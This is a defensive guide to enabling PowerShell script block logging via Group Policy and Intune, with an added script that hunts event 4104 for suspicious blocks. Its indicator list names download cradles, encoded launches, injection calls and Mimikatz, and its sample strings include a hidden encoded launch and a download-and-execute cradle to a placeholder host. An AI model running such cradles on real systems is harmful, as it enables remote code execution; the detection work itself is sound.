
How to log and monitor PowerShell activity for suspicious scripts and commands



Group Policy

If you use traditional Active Directory tools, use Group Policy to enable PowerShell logging. Open the Group Policy Management Console. Create a new Group Policy Object (GPO) or edit an existing one. Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell. Locate the setting "Turn on PowerShell Script Block Logging" and set it to Enabled.

PowerShell Script Block Logging

Susan Bradley / CSO

This logging allows you to capture the content of all executed script blocks, including commands and functions, as they are actually run, so obfuscated or encoded code is recorded in its decoded form. The entries land as event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which is small by default (15 MB) and rolls over quickly on a busy host, so increase its size or forward the events to your SIEM if you intend to hunt in them.

Intune

Similarly, in Intune perform the following steps: Go to the Microsoft Intune admin center and find Devices. Click on Windows devices and Configuration. Click Create, then select New Policy. Select Windows 10 and later, select Settings Catalog under profile type, and click Create. Enter PowerShell Configuration as the name, enter a description if needed, and click Next. Click Add settings, enter PowerShell in the Search for a setting bar, and click Search. Select Administrative Templates\Windows Components\Windows PowerShell, and click Select all these settings, or go through each one and select those you want to monitor.
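Whichever way the policy is delivered, the "Turn on PowerShell Script Block Logging" setting ends up as a registry value under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, and the resulting 4104 events are what you actually monitor. The script below is an added example written for this page, not code from the original article or from Microsoft; it enables the same value locally (useful for a lab host or for verifying that the GPO or Intune policy applied), then reads recent 4104 events and flags script blocks that match a small indicator list. The indicator patterns, the sample script blocks and the function names are this example's own choices; the registry path, the log name and the 4104 property layout are Microsoft's. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows, run elevated.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original article. Enables Script Block Logging via the
# policy registry value the GPO/Intune setting writes, then hunts 4104 events for
# suspicious script blocks.

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Enable-ScriptBlockLogging {
    # Same effect as "Turn on PowerShell Script Block Logging" = Enabled.
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    New-ItemProperty -Path $PolicyKey -Name EnableScriptBlockLogging -PropertyType DWord -Value 1 -Force | Out-Null
    # Start/stop events (4105/4106) are very noisy; keep them off unless you need them.
    New-ItemProperty -Path $PolicyKey -Name EnableScriptBlockInvocationLogging -PropertyType DWord -Value 0 -Force | Out-Null
}

function Test-ScriptBlockLogging {
    # $true when the policy value is set, whether by GPO, Intune or the function above.
    (Get-ItemProperty -Path $PolicyKey -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
}

# Indicator list chosen for this example: a starting point, not an exhaustive ruleset.
$SuspiciousPatterns = @(
    '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}',              # base64 payload passed on the command line
    'FromBase64String',                                          # in-script base64 decoding
    'Invoke-Expression|\bIEX\b',                                 # eval of dynamically built code
    'DownloadString|DownloadFile|Net\.WebClient',                # download cradles
    '-nop\b.*-w(indowstyle)?\s+hidden',                          # classic hidden, no-profile launch
    'VirtualAlloc|WriteProcessMemory|CreateThread',              # in-memory injection primitives
    'Invoke-Mimikatz|Invoke-Shellcode|Invoke-ReflectivePEInjection'
)

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)
    # Returns the patterns that matched (empty when the block looks benign). -match is case-insensitive.
    $hits = foreach ($p in $SuspiciousPatterns) { if ($ScriptBlockText -match $p) { $p } }
    return @($hits)
}

function Get-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 1000)
    # 4104 payload order: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText, [3] ScriptBlockId, [4] Path.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $hits = @(Test-SuspiciousScriptBlock -ScriptBlockText $text)
        # Level 3 (Warning) means PowerShell itself judged the block suspicious; it writes
        # those even when the policy is not enabled, so they deserve a look regardless.
        if ($hits.Count -gt 0 -or $_.Level -eq 3) {
            [pscustomobject]@{
                Time          = $_.TimeCreated
                Computer      = $_.MachineName
                ScriptBlockId = $_.Properties[3].Value      # join multi-part blocks on this id
                Path          = $_.Properties[4].Value      # empty for interactive/in-memory code
                Matched       = ($hits -join ', ')
                AutoFlagged   = ($_.Level -eq 3)
                Preview       = ($text -replace '\s+', ' ').Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed sample blocks (not real log data) to exercise the detector offline:
$samples = @(
    'Get-ChildItem C:\Temp | Sort-Object Length',
    'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p.ps1")'
)
foreach ($s in $samples) {
    $m = @(Test-SuspiciousScriptBlock -ScriptBlockText $s)
    $label = if ($m.Count -gt 0) { 'SUSPECT' } else { 'clean  ' }
    "$label  $s"
}

# Make sure logging is on, then review what this host has already recorded.
if (-not (Test-ScriptBlockLogging)) { Enable-ScriptBlockLogging }
Get-SuspiciousScriptBlocks -MaxEvents 500 | Format-Table -AutoSize
```

Long script blocks are split across several 4104 events (MessageNumber of MessageTotal, sharing one ScriptBlockId), so a pattern can be cut across the boundary; when a hit matters, reassemble the block by ScriptBlockId before deciding. Treat the regex list as a seed for your own detections and tune it against the administrative scripts that legitimately run in your environment.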